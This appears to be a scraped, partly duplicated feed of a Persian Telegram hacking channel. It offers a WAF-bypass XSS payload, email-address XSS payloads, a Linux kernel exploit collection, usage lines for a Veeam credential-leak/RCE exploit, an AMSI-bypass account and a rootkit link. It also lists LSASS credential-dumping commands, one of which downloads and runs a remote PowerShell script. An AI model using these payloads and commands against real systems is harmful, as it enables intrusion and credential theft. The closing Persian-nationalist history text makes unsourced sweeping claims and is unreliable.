بای پس برای FortiWeb (Fortinet) WAF
استفاده:
یعنی به جای بارگذاری استاندارد XSS برای اجرای js
#waf #Bypass
@Pfksecurity
استفاده:
"><iframe src=//14.rs>یعنی به جای بارگذاری استاندارد XSS برای اجرای js
#waf #Bypass
@Pfksecurity
kernel-linux-factory
راحت است زیرا نیازی به کامپایل یا تنظیم محیط ندارید، من به این نگاه کردم که کدام کرنل، یک splot راه اندازی کرد.
به عنوان بخشی از اکسپلویت برای:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux
#exploits
#kernel
@PfkSecurity
راحت است زیرا نیازی به کامپایل یا تنظیم محیط ندارید، من به این نگاه کردم که کدام کرنل، یک splot راه اندازی کرد.
به عنوان بخشی از اکسپلویت برای:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918
download
#linux
#exploits
#kernel
@PfkSecurity
GitHub
GitHub - bsauce/kernel-exploit-factory: Linux kernel CVE exploit analysis report and relative debug environment. You don't need…
Linux kernel CVE exploit analysis report and relative debug environment. You don't need to compile Linux kernel and configure your environment anymore. - GitHub - bsauce/kernel-exploit-fac...
درباره Payloads در ایمیل
موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:
…
در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.
ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ میتوانید سرور ایمیل خود را راهاندازی کنید یا آن را آسانتر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیلهای زیر معتبر هستند و به Burp Collab شما پیام ارسال میکنند (به جای xxxx.oastify.com با ایمیل شما):
#xss
#rce
#sqli
#ssti
@PfkSecurity
موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:
"payload"@domain.com
name@"payload"domain.com
name(payload)@domain.com
name@(payload)domain.com
[email protected](payload)…
در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.
ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ میتوانید سرور ایمیل خود را راهاندازی کنید یا آن را آسانتر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیلهای زیر معتبر هستند و به Burp Collab شما پیام ارسال میکنند (به جای xxxx.oastify.com با ایمیل شما):
[email protected]
mail(<script>alert(0)</script>)@xxxx.oastify.com
"<img/src/onerror=alert(0)>"@xxxx.oastify.com
#web #xss
#rce
#sqli
#ssti
@PfkSecurity
CVE-2023-27532
بله، دوباره Veeam Backup & Replication
نشت حساب ها در متن ساده یا اجرای دستور از راه دور.
https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
POC exploit
usage:
#rce
#leakPass
@Pfksecurity
بله، دوباره Veeam Backup & Replication
نشت حساب ها در متن ساده یا اجرای دستور از راه دور.
https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
POC exploit
usage:
VeeamHax.exe --target 192.168.0.100
OrVeeamHax.exe --target 192.168.0.100 --cmd calc.exe
#veeam #rce
#leakPass
@Pfksecurity
در سال 2023 ویندوز 11 AMSI را به خطر بیاندازید و بایپس کنید .
همچون(به عنوان) یک محقق امنیتی و مشتاق تیم قرمز، من همیشه مجذوب عملکرد درونی نرم افزار آنتی ویروس و سایر اقدامات امنیتی طراحی شده برای نگهداری از سیستم های رایانه ای بوده ام. بتازگی، چالش دور زدن رابط اسکن ضد بدافزار (AMSI) در ویندوز را برای خودم قرار دادم، یک ویژگی امنیتی که از زمان معرفی تیمهای قرمز و مهاجمان را به دردسر انداخته است.
پس از ساعتهای بیشماری تحقیق، آزمایش و آزمون و خطا، سرانجام در سال 2023 موفق شدم AMSI را دور بزنم. در این داستان، تکنیکها و روشهایی را که برای انجام این شاهکار استفاده کردم را با شما به اشتراک میگذارم. از درک اصول اساسی AMSI تا تجزیه و تحلیل نقاط ضعف آن، من شرح گسترده از مراحلی که منجر به دور زدن موفقیت آمیز من شد ارائه خواهم کرد.
امیدوارم از طریق این داستان، چالشها و پیش آمدهایی را که با تیم قرمز به وجود میآیند، و همچنین اهمیت استفاده مسئولانه و اخلاقی از مهارتها و دانش، روشن کنم. بنابراین، دست و پنجه نرم کنید و در این سفر هیجان انگیز به دنیای دور زدن AMSI به من بپیوندید!
در تلاشم برای دور زدن AMSI، با ابزارهای C2 مانند Cobalt Strike، Sliver و Havoc C2 برخورد کردم. این ابزارها با قابلیت های خود مرا تحت تأثیر قرار دادند و بینش های ارزشمندی را در مورد نهش (وضعیت) فعلی سیستم های امنیتی ارائه کردند. از طریق کاوش در این ابزارها، به درک عمیق تری از نحوه تفکر و عملکرد مهاجمان دست یافتم که در آزمایش و تحقیق امنیتی مشروع من مفید واقع شده است.
Shellcodes
شل کدها به یک قطعه کد کوچک اشاره دارد که به عنوان اصطلاحا محموله یا ( پیلود ) در یک اکسپلویت یا حمله استفاده می شود. این برنامه به گونه ای طراحی شده است که مستقیماً در حافظه اجرا شود و می توان از آن برای کنترل یک سیستم تارگت، افزایش دسترسی ها یا انجام سایر اقدامات مخرب استفاده کرد.
برای پروژهام، استفاده از پیلود Sliver را انتخاب کردم زیرا سطح بالایی از مخفی کاری را ارائه میداد و به من اجازه میداد تا از اقدامات امنیتی مختلف عبور کنم. Sliver یک ابزار محبوب C2 است که می تواند برای اهداف مختلفی از جمله تست نفوذ، تیم قرمز و سایر فعالیت های مرتبط با امنیت استفاده شود.
ادامه دارد ...
#AMSI #Bypass
@PfkSecurity
همچون(به عنوان) یک محقق امنیتی و مشتاق تیم قرمز، من همیشه مجذوب عملکرد درونی نرم افزار آنتی ویروس و سایر اقدامات امنیتی طراحی شده برای نگهداری از سیستم های رایانه ای بوده ام. بتازگی، چالش دور زدن رابط اسکن ضد بدافزار (AMSI) در ویندوز را برای خودم قرار دادم، یک ویژگی امنیتی که از زمان معرفی تیمهای قرمز و مهاجمان را به دردسر انداخته است.
پس از ساعتهای بیشماری تحقیق، آزمایش و آزمون و خطا، سرانجام در سال 2023 موفق شدم AMSI را دور بزنم. در این داستان، تکنیکها و روشهایی را که برای انجام این شاهکار استفاده کردم را با شما به اشتراک میگذارم. از درک اصول اساسی AMSI تا تجزیه و تحلیل نقاط ضعف آن، من شرح گسترده از مراحلی که منجر به دور زدن موفقیت آمیز من شد ارائه خواهم کرد.
امیدوارم از طریق این داستان، چالشها و پیش آمدهایی را که با تیم قرمز به وجود میآیند، و همچنین اهمیت استفاده مسئولانه و اخلاقی از مهارتها و دانش، روشن کنم. بنابراین، دست و پنجه نرم کنید و در این سفر هیجان انگیز به دنیای دور زدن AMSI به من بپیوندید!
در تلاشم برای دور زدن AMSI، با ابزارهای C2 مانند Cobalt Strike، Sliver و Havoc C2 برخورد کردم. این ابزارها با قابلیت های خود مرا تحت تأثیر قرار دادند و بینش های ارزشمندی را در مورد نهش (وضعیت) فعلی سیستم های امنیتی ارائه کردند. از طریق کاوش در این ابزارها، به درک عمیق تری از نحوه تفکر و عملکرد مهاجمان دست یافتم که در آزمایش و تحقیق امنیتی مشروع من مفید واقع شده است.
Shellcodes
شل کدها به یک قطعه کد کوچک اشاره دارد که به عنوان اصطلاحا محموله یا ( پیلود ) در یک اکسپلویت یا حمله استفاده می شود. این برنامه به گونه ای طراحی شده است که مستقیماً در حافظه اجرا شود و می توان از آن برای کنترل یک سیستم تارگت، افزایش دسترسی ها یا انجام سایر اقدامات مخرب استفاده کرد.
برای پروژهام، استفاده از پیلود Sliver را انتخاب کردم زیرا سطح بالایی از مخفی کاری را ارائه میداد و به من اجازه میداد تا از اقدامات امنیتی مختلف عبور کنم. Sliver یک ابزار محبوب C2 است که می تواند برای اهداف مختلفی از جمله تست نفوذ، تیم قرمز و سایر فعالیت های مرتبط با امنیت استفاده شود.
ادامه دارد ...
#AMSI #Bypass
@PfkSecurity
P.F.K Security
#0x16 > Cobalt Strike+Sysinternals Methods: load sysinternals Procexp “File” -> “Save” Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump…
#0x28 > Manjusaka
Methods:
#0x29 >Dumpert
Methods:
#0x30 >NanoDump
Methods:
#0x31 >Spraykatz
Methods:
#0x32 >HandleKatz
Methods:
#0x33 >CallBackDump
Methods:
#0x34 > LsassSilentProcessExit
Methods:
#0x35 > AndrewSpecial
Methods:
#0x36 >Masky
Methods:
#0x37 >SharpMiniDump
Methods:
#0x38 >MiniDump
Methods:
#0x39 >LsassDumpReflectiveDll
Methods:
#0x40 >MoonSols Windows Memory Toolkit
Methods:
#lass
@PfkSecurity
Methods:
mshta.exe javascript:A=new ActiveXObject(“WScript.Shell”).run(“powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(‘https://:/r.ps1')",0);close(); Manjusaka lsass dump#0x29 >Dumpert
Methods:
Dumpert.exe -k lsass.exe -s -o lsass.dmp#0x30 >NanoDump
Methods:
NanoDump.exe -t [process ID] -o [output file path]#0x31 >Spraykatz
Methods:
spraykatz.exe -w -u -p --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"#0x32 >HandleKatz
Methods:
HandleKatz.exe -p lsass.exe HandleKatz.exe -p lsass.exe -o [handle ID] -dump#0x33 >CallBackDump
Methods:
CallbackDump.exe -d -p#0x34 > LsassSilentProcessExit
Methods:
LsassSilentProcessExit.exe#0x35 > AndrewSpecial
Methods:
AndrewSpecial andrew.dmp!#0x36 >Masky
Methods:
.\Masky.exe /ca:’CA SERVER\CA NAME’ (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)#0x37 >SharpMiniDump
Methods:
SharpMiniDump.exe -p -o lsass.dmp#0x38 >MiniDump
Methods:
MiniDump.exe /p /o#0x39 >LsassDumpReflectiveDll
Methods:
Import-Module .\ReflectiveLsassDump.dll Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id#0x40 >MoonSols Windows Memory Toolkit
Methods:
MoonSolsWindowsMemoryToolkit.exe Dumping->Launch DumpIt LSASS->Select the process to dump#lass
@PfkSecurity
Chaos-Rootkit
x64 ring0 windows rootkit
https://github.com/ZeroMemoryEx/Chaos-Rootkit
#rootkit
#windows
#ring0
@pfksecurity
x64 ring0 windows rootkit
https://github.com/ZeroMemoryEx/Chaos-Rootkit
#rootkit
#windows
#ring0
@pfksecurity
GitHub
GitHub - ZeroMemoryEx/Chaos-Rootkit: Now You See Me, Now You Don't
Now You See Me, Now You Don't . Contribute to ZeroMemoryEx/Chaos-Rootkit development by creating an account on GitHub.
ششم فروردین ماه #زادروز ابرمرد پاک ایران باستان، #اشوزرتشت اسپنتمان گرامی باد.💚🤍❤️
#زادروز پیامآور خرد #اشوزرتشت بزرگ آریایی شاد باد.💚🤍❤️
بشد نوروز پاک زندگانی☘️
بشد روزی که ماند جاودانی🍷
ششم روز زمان فروردین ماهی🌎
که زرتشت آمد و افروخت چراغی🔥
@PfkSecurity
#زادروز پیامآور خرد #اشوزرتشت بزرگ آریایی شاد باد.💚🤍❤️
بشد نوروز پاک زندگانی☘️
بشد روزی که ماند جاودانی🍷
ششم روز زمان فروردین ماهی🌎
که زرتشت آمد و افروخت چراغی🔥
@PfkSecurity
ﺩﺭ ﺣﺪﻭﺩ ١٩٥٠ ﺳﺎﻝ ﭘﻴﺶ، ﺭﻭﻡ ﺑﻪ ﺍﻭﺭﺷﻠﻴﻢ ﺣﻤﻠﻪ ﻛﺮﺩ، ﺁﻥ ﺷﻬﺮ ﺭﺍ ﻭﻳﺮﺍﻥ ﻛﺮﺩ ﻭ ﻣﺮﺩﻣﺎﻧﺶ ﺭﺍ ﺑﻪ ﺑﺮﺩﮔﻰ ﮔﺮﻓﺖ .
ﺣﺪﻭﺩ ٤٥ ﺗﺎ ٦٠ ﻫﺰﺍﺭ ﻧﻔﺮ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ، ﺑﺮﺍﻯ ﺳﺎﺧﺘﻦ *ﻛﻮﻟﻮﺳﻴﻮﻡ* ﺑﻪ ﻛﺎﺭﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .
ﺑﺨﺶ ﺑﺰﺭﮔﻰ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ ﺩﺭ ﺣﻴﻦ ﻛﺎﺭ ﻛﺸﺘﻪ ﺷﺪﻧﺪ .
ﻣﺮﺍﺳﻢ ﺍﻓﺘﺘﺎﺣﻴﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺎ ﻛﺸﺘﺎﺭ ٩ ﻫﺰﺍﺭ ﺣﻴﻮﺍﻥ ﻏﻴﺮﺍﻫﻠﻰ ﺑﺮﮔﺰﺍﺭ ﺷﺪ .
ﺩﺭ ﻛﻮﻟﺴﻴﻮﻡ ﺯﻧﺎﻥ ﻭ ﻣﺮﺩﺍﻥ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﻮﺩﻧﺪ .
ﺟﺎﻳﮕﺎﻩ ﺯﻧﺎﻥ ﺩﺭ ﻃﺒﻘﻪ ﭘﻨﺠﻢ ﺑﻮﺩ، ﻛﻪ ﺩﻳد بسیار ﺑﺪﻯ ﺑﻪ ﻣﻴﺪﺍﻥ ﺩﺍﺷﺖ .
ﺟﺎﻳﮕﺎﻩ ﻣﺨﺼﻮﺹ ﺯﻧﺎﻥ ﺩﺭ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺴﻴﺎﺭ ﻧﺎﺍﻣﻦ ﻭ ﺧﻄﺮﻧﺎﻙ بوﺩ، ﭼﺮﺍ ﻛﻪ ﺳﻜﻮﻫﺎﻯ ﺁﻧﻬﺎ ﺑﺎ ﻃﻨﺎﺏ ﻫﺎﻳﻰ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﻣﻴﺸﺪ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﻯ ﭘﺎﺭﻩ ﻣﻴﺸﺪﻧﺪ
ﻭ ﺯﻧﺎﻥ ﺍﺯ ﺍﺭﺗﻔﺎﻉ ٥٠ ﻣﺘﺮﻯ ﺑﻪ ﭘﺎﻳﻴﻦ ﺳﻘﻮﻃﻰ ﻣﺮﮔﺒﺎﺭ ﻣﻴﻜﺮﺩﻧﺪ . ﺍﻣﺎ ﺟﺎﻳﮕﺎﻩ ﻣﺮﺩﺍﻥ ﺑﺴﻴﺎﺭ ﺍﻣﻦ ﺑﻮﺩ . ﺁﻧﻬﺎ ﺑﺮ ﺭﻭﻯ ﺳﻜﻮﻫﺎﻯ ﺳﻨﮕﻰ ﻣﻰ ﻧﺸﺴﺘﻨﺪ .
ﻛﻮﻟﻮﺳﻴﻮﻡ، ﻣﺤﻞ ﺑﺮﮔﺰﺍﺭﻯ ﺟﺸﻨﻬﺎﻯ ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﺑﻮﺩ .
ﺩﺭ ﻃﻰ ﺍﻳﻦ ﺟﺸﻨﻬﺎ، ﻛﻪ ﻫﺮباﺭ ١٠٠ ﺭﻭﺯ ﺑﻪ ﺩﺭﺍﺯﺍ ﻣﻴﻜﺸﻴﺪ، ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺑﺮﺩﮔﺎﻥ ﻭ ﮔﻼﺩﻳﺎﺗﻮﺭﻫﺎ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﻭ ﻳﺎ ﮔﻼﺩﻳﻮﺗﻮﺭﻫﺎ، ﻛﻪ ﺑﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺍﻣﻴﺪ ﺑﻪ ﺯﻧﺪﮔﻰ ﺁﻧﻬﺎ ﺑﻪ ﺳﺨﺘﻰ ﺑﻪ ٢٢ ﺳﺎﻟﮕﻰ ﻣﻴﺮﺳﻴﺪ، ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﻛﺸﺘﻦ ﻳﻜﺪﻳﮕﺮ ﻣﻴﻜﺮﺩﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺍﻳﻦ ﻛﺸﺘﺎﺭ ﺑﻮﺩﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻟﺬﺕ ﻣﻴﺒﺮﺩﻧﺪ .
ﺩﺭ ﻃﻰ ﻫﺮ ﺩﻭﺭﻩ ﺍﺯ ﺍﻳﻦ ﺟﺸﻦ ﻫﺎ ﺣﺪﻭﺩ ٥ ﻫﺰﺍﺭ ﺑﺮﺩﻩ ﻭ ﮔﻼﺩﻳﻮﺗﻮﺭ ﺑﻪ ﻗﺘﻞ ﻣﻴﺮﺳﻴﺪﻧﺪ .
ﺩﺭ ﺭﻭﺯﻫﺎﻳﻰ ﻛﻪ ﺟﺸﻦ ﺑﺮﻗﺮﺍﺭ ﻧﺒﻮﺩ، ﻣﺤﻜﻮﻣﺎﻥ ﺑﻪ ﻣﺮﮒ ﺭﺍ ﺟﻠﻮﻯ ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﺗﺎ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﻮﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﺁﺩﻣﻴﺎﻥِ تیره ﺑﺨﺖ ﺑﻮﺩﻧﺪ .
ﺩﺭ ﻛﻞ،
*ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، ﺍﺯ ﺟﻤﻠﻪ ٥٠٠ ﺗﺎ ٧٠٠ ﻫﺰﺍﺭ ﮔﻼﺩﻳﺎﺗﻮﺭ، ﺩﺭ ﺻﺤﻦ ﻛﻠﻮﺳﻴﻮﻡ ﺑﻪ ﻃﺮﺯ ﻭﺣﺸﻴﺎﻧﻪ ﺍﻯ ﻛﺸﺘﻪ ﺷﺪﻧﺪ* .
ﺍﻳﻦ ﻣﻴﺪﺍﻥ ﭼﻬﺎﺭ ﻫﺰﺍﺭ ﻣﺘﺮ ﻣﺮﺑﻌﻰ، ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺘﻠﮕﺎﻩ ﺗﺎﺭﻳﺦ ﺑﺸﺮﻳﺖ ﺑﻮﺩﻩ ﺍﺳﺖ .
ﺍﻣﺮﻭﺯﻩ، ﻛﻮﻟﻮﺳﻴﻮﻡ ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﺑﻨﺎﻯ ﺍﻳﺘﺎﻟﻴﺎ، ﻧﻤﺎﺩ ﺷﻬﺮ ﺭﻡ ﻭ ﺗﻤﺪﻥ ﺭﻭﻣﻰ ﺍﺳﺖ .
ﻫﻤﻪ ﺭوﻣﻴﺎﻥ،ایتاﻟﻴﺎﻳﻴﻬﺎ ﻭ ﺣﺘﻰ ﺍﺭﻭﭘﺎﻳﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﺗﻤﺪﻥ ﺍﻓﺘﺨﺎﺭ ﻣﻴﻜﻨﻨﺪ . !
ﺩﺭ ﺳﺎﻝ ٢٠٠٧، ﺩﺭ ﻃﻰ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻰ ﺑﺎ ﺷﺮﻛﺖ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، *ﻛﻮﻟﻮﺳﻴﻮﻡ ﺟﺰﻭ ٧ ﺍﺛﺮ* ﺑﺮﺗﺮ ﻭ ﻣﺤﺒﻮﺏ ﺟﻬﺎﻥ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ .!!!
ﺩﺭ ﺳﺎﻝ ٢٠١١، ﻣﺒﻠﻎ ٢٥ ﻣﻴﻠﻴﻮﻥ ﻳﻮﺭﻭ، ﺗﻨﻬﺎ ﺑﺮﺍﻯ ﺗﻤﻴﺰ ﻛﺮﺩﻥ ﺩﻳﻮﺍﺭﻫﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ ﻭ ﭼﻨﺪ ﻛﺎﺭ
ﺑﺴﻴﺎﺭ ﺟﺰﻳﻰ ﺩﻳﮕﺮ ﺩﺭ ﺩﺭﻭﻥ ﺁﻥ، ﻫﺰﻳﻨﻪ ﺷﺪ .
ﻳﻚ ﺿﺮﺏ ﺍﻟﻤﺜﻞ ﻗﺪﻳﻤﻰ ﺍﻳﺘﺎﻟﻴﺎﻳﻰ ﻣﻴﮕﻮﻳﺪ :
*" تازﻣﺎﻧﻰ ﻛﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ، ﺭﻡ ﻧﻴﺰ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ".*
ﺣﺪﻭﺩ ٦٠٠ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺳﺎﺧﺘﻪ ﺷﺪﻥ ﻛﻮﻟﻮﺳﻴﻮﻡ، ﺍﻳﺮﺍﻧﻴﺎﻥ *ﺗﺨﺖ ﺟﻤﺸﻴﺪ* ﺭﺍ ﺳﺎﺧﺘﻨﺪ .
*-ﺍﺛﺮﻯ ﭘﺮﺷﻜﻮﻩ ﺑﺎ ﺯﻳﺮﺑﻨﺎﻯ ١٧٥ ﻫﺰﺍﺭ ﻣﺘﺮ - ٨ ﺑﺮﺍﺑﺮ ﻛﻞ ﺯﻳﺮﺑﻨﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ* .
ﺑﺮ ﺍﺳﺎﺱ ﺳﻨﺪﻫﺎﻯ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻧﻜﺎﺭ - ﺧﺸﺖ ﻫﺎﻯ ﭘﺨﺘﻪ ﺷﺪﻩ ﺁﻥ ﺯﻣﺎﻥ
*-ﺩﺭ ﺳﺎﺧﺘﻦ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻫﻴﭻ ﺑﺮﺩﻩ ﺍﻯ ﺑﻪ ﻛﺎﺭ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ*.
ﻛﺎﺭﮔﺮﺍﻥ، ﻣﻬﻨﺪﺳﺎﻥ ﻭ ﻫﻨﺮﻣﻨﺪﺍﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺷﺮﺍﻳﻂِ ﻛﺎﺭﻯِ ﻣﻤﻜﻦ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﺑﺸﺮﻯ ﺭﺍ ﺁﻓﺮﻳﺪﻧﺪ .
ﭘﺎﺩﺷﺎﻫﺎﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﺟﺸﻨﻬﺎﻯ ﺍﻳﺮﺍﻧﻰ ﻣﺎﻧﻨﺪ *ﻧﻮﺭﻭﺯﻭﻣﻬﺮﮔﺎﻥ*،
ﻛﻪ ﺭﻳﺸﻪ ﺩﺭ *ﺁﺷﺘﻰ، ﻣﻬﺮ، ﻃﺒﻴﻌﺖ ﻭ ﺯﻧﺪﮔﻰ ﺍﻧﺴﺎﻧﻰ ﺩﺍﺭﺩ*، ﺭﺍ ﺑﺮﭘﺎ ﻣﻴﺪﺍﺷﺘﻨﺪ .
ﻫﻤﻪ ﻧﮕﺎﺭﻩ ﻫﺎﻯ ﺣﻚ ﺷﺪﻩ ﺑﺮ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺳﻨﮕﻬﺎﻯ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻧﺸﺎﻧﮕﺮ *ﺟﺸﻨﻬﺎ، ﻓﺮﻫﻨﮓ ﻭ ﻣﻴﺘﻮﻟﻮﮊﻯ ﺯﻳﺒﺎﻯ ﺍﻳﺮﺍﻧﻰاست.*
درتصاویرحکاکی شده برسنگ نبشته های تخت جمشید ،
هیچکس خشمگین وعصبانی نیست،
هیچکس سوار بر اسب نیست،
هیچکس رادرحال تعظیم نمی بینید،
هیچ زمان برده داری در ایران نبوده،
درمیان این همه پیکر تراشیده شده، حتی یک نقش،تصویر وچهره ی برهنه وجود ندارد.
*ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻣﺮﻛﺰ ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺪﺭﺕ ﺟﻬﺎﻥ ﺩﺭ ﺁﻥ ﺭﻭﺯﮔﺎﺭ ﺑﻮﺩﻩ ﺍﺳﺖ* .
ﺍﻣﺎ ﺑﺮﺧﻮﺭﺩ ﺑﺮﺧﻰ ﺍﺯ ﻣﺎ ﺍﻳﺮﺍﻧﻴﺎﻥ، ﺑﻪ ﻭﻳﮋﻩ واپسگرایان ﻭ ﺑﺮﺧﻰ ﻣﺪﻋﻴﺎﻥ ﺭﻭﺷﻨﻔﻜﺮﻯ، ﺑﺎ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﻫﻨﺮﻯ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﻏﻴﺮﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻧﺎﺑﺨﺮﺩﺍﻧﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﯿﺪ ۳۲ ﻫﺰﺍﺭ ﻟﻮﺡ ﮔﻠﯽ ﺑﺪﺳﺖ آﻣﺪﻩ ﮐﻪ ﺩﺭ ﺍﻥ ﺷﺮﺡ ﻭﻗﺎﯾﻊ ﺭﻭﺯﺍﻧﻪ ﺭﺍ ﺩﺭ ﻣﺮﺍﺣﻞ ﺳﺎﺧﺖ ﺍﯾﻦ ﺑﻨﺎﯼ ﺑﺎﺷﮑﻮﻩ ﺑﯿﺎﻥ ﻣﯿﮑﻨﺪ ﺑﺎ ﺗﻤﺎﻡ ﺟﺰﺋﯿﺎﺕ ﻣﺜل ﺍﯾﻨﮑﻪ ﮐﺎﺭﮔﺮﺍﻥ و ﻣﻬﻨﺪﺳﺎﻥ ﻫﺮ ﮐﺪﺍﻡ ﺑﻪ ﻧﻮﻉ ﺗﺨﺼﺼﯽ ﮐﻪ ﺩﺍﺭند ﭼﻪ ﻣﯿﺰﺍﻥ ﺣﻘﻮﻕ ﺩﺭﯾﺎﻓﺖ ﻣﯿﮑﻨﻨﺪ،
*ﮐﺸﻮﺭﻫﺎﯼ ﺩﺍﻋﯿﻪ ﺩﺍﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺑﻪ ﭼﻪ ﭼﯿﺰﯼ ﻣﻔﺘﺨﺮﻥ ﻭ ﻣﺎ ﭼﻪ ﭼﯿﺰﯼ ﺭﺍ ﻟﻌﻦ ﻭ ﻧﻔﺮﯾﻦ ﻣﯿﮑﻨﯿﻢ ﻭ ﻧﻤﺎﺩﯼ ﺍﺯ ﻇﻠﻢ ﻭ ﺳﺘﻢ ﺟﺒﺎﺭﺍﻥ ﻭ ﺳﺘﻤﮕﺮﺍﻥ ﺭﻭﺯﮔﺎﺭ ﻣﯿﺪاﻧﯿﻢ*.
